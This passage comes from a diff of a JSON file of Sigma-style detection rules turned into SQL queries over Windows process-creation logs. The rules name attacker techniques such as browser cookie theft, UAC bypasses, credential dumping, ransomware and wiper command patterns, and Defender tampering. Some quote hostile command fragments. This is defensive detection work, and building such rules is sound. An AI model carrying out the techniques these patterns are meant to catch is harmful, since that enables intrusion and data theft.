(((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND 
CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x 
=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects 
a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' 
switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper 
malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": 
"eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": 
"a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' 
ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND 
CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": 
"proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": 
"proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 
